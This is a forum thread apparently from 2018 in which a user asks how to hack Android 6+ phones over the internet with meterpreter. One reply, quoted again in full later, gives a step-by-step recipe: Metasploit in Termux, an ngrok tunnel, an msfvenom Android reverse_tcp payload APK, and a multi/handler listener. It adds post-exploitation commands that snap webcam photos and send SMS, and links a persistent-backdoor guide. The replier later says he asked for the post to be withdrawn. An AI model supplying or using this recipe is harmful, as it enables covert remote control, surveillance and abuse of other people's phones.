Benny639 Posted October 1, 2018 Share Posted October 1, 2018 Hi there! i was hacking android 5 and 4 with evil-droid and sometimes with metasploit but now for hacking android 6 and higher...i can't manage to get a strong meterpreter session from victim.Meterpreter session open and close immediately(Possibly due to android 6 and higher more security)....Please guide me how can i hack android 6 and higher smoothly...if you have any other good way to hack android over wan then please let me know..Thank you! Quote Link to comment Share on other sites More sharing options...
acid klown Posted October 14, 2018 Share Posted October 14, 2018 Hi Benny! ^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team! I am interested in the same topic, and spent a lot of time this week making it all real. Here is a summary of what I did to pwn my Android phone via my other Android phone: 1) Download Termux on Google play store. 2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh 3) git clone https://github.com/rapid7/metasploit-framework 4) CD metasploit-framework 5) bundle install (takes about 5 minutes) 6) Go to https://dashboard.ngrok.com/user/signup And register a port forwarding free. 7) git clone https://github.com/inconshreveable/ngrok 8)CD ngrok 9)./ngrok tokenauth (your ngrok token) one time dealio 10) ping o.tcp.ngrok.io (get the ngrok IP address) 11) ./ngrok tcp 4564 12)open new windows session Slide thumb to the right. Offers termux new session. In new session, CD metasploit framework. 13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk This creates payliad on Root directory in Android phone. 14) ./msfconsole 15) msf> use exploit /multi/handler msf> set payload android/meterpreter/reverse_tcp msf> set LHOST localhost msf> set lport 4564 msf> exploit -j -z 16) run lolz.apk payload on other phone. Ngrok waiting for session. Mad waiting for session. Bvoila! Once it connects, Type sessions -i 1 and see meterpreter. Type help for commands. Type command -h for help with a command. webcam_snap -i 2 -p /sdcard/selfy.jpg send_sms -d 2149711234 -t "what's up Darren :)" commands here https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699 You can make the connection persistent only as long as they are not rebooted. To make persistent shell, see this article: https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ Manz, your good to pwn. I also recommend, Git clone https:///github.com/RajkumrdusadTool-X 200 kali tools for termux!! I love this pr09. Please note: Ngrok port randomly changes, so your payload must co-align. I haven't used evil Droid so maybe you know. ? - คςเ๔ кɭ๏ฬภ 2 Quote Link to comment Share on other sites More sharing options...
icarus255 Posted October 21, 2018 Share Posted October 21, 2018 (edited) There are plenty of youtube videos on how to do this. Above post summarises the process pretty well too. Technically speaking, you don't need ngrok to handle connections over WAN. You just need to add port forwarding rules on your router to direct traffic to your local listener/server address. As for your closing connections, that could be for any number of reasons including: firewall rules blocking incoming/outgoing traffic on certain ports, misconfigred payloads, etc. I don't use android phones anymore so I haven't tested this on any new phones to confirm if new security policies are the issue. Edited October 22, 2018 by icarus255 Inappropriate suggestion Quote Link to comment Share on other sites More sharing options...
acid klown Posted October 22, 2018 Share Posted October 22, 2018 I already requested my response to be withdrawn. I dont support terrorism. Quote Link to comment Share on other sites More sharing options...
Forkish Posted October 26, 2018 Share Posted October 26, 2018 On 10/14/2018 at 5:03 AM, acid klown said: Hi Benny! ^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team! I am interested in the same topic, and spent a lot of time this week making it all real. Here is a summary of what I did to pwn my Android phone via my other Android phone: 1) Download Termux on Google play store. 2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh 3) git clone https://github.com/rapid7/metasploit-framework 4) CD metasploit-framework 5) bundle install (takes about 5 minutes) 6) Go to https://dashboard.ngrok.com/user/signup And register a port forwarding free. 7) git clone https://github.com/inconshreveable/ngrok 8)CD ngrok 9)./ngrok tokenauth (your ngrok token) one time dealio 10) ping o.tcp.ngrok.io (get the ngrok IP address) 11) ./ngrok tcp 4564 12)open new windows session Slide thumb to the right. Offers termux new session. In new session, CD metasploit framework. 13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk This creates payliad on Root directory in Android phone. 14) ./msfconsole 15) msf> use exploit /multi/handler msf> set payload android/meterpreter/reverse_tcp msf> set LHOST localhost msf> set lport 4564 msf> exploit -j -z 16) run lolz.apk payload on other phone. Ngrok waiting for session. Mad waiting for session. Bvoila! Once it connects, Type sessions -i 1 and see meterpreter. Type help for commands. Type command -h for help with a command. webcam_snap -i 2 -p /sdcard/selfy.jpg send_sms -d 2149711234 -t "what's up Darren :)" commands here https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699 You can make the connection persistent only as long as they are not rebooted. To make persistent shell, see this article: https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ Manz, your good to pwn. I also recommend, Git clone https:///github.com/RajkumrdusadTool-X 200 kali tools for termux!! I love this pr09. Please note: Ngrok port randomly changes, so your payload must co-align. I haven't used evil Droid so maybe you know. ? - คςเ๔ кɭ๏ฬภ A+ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.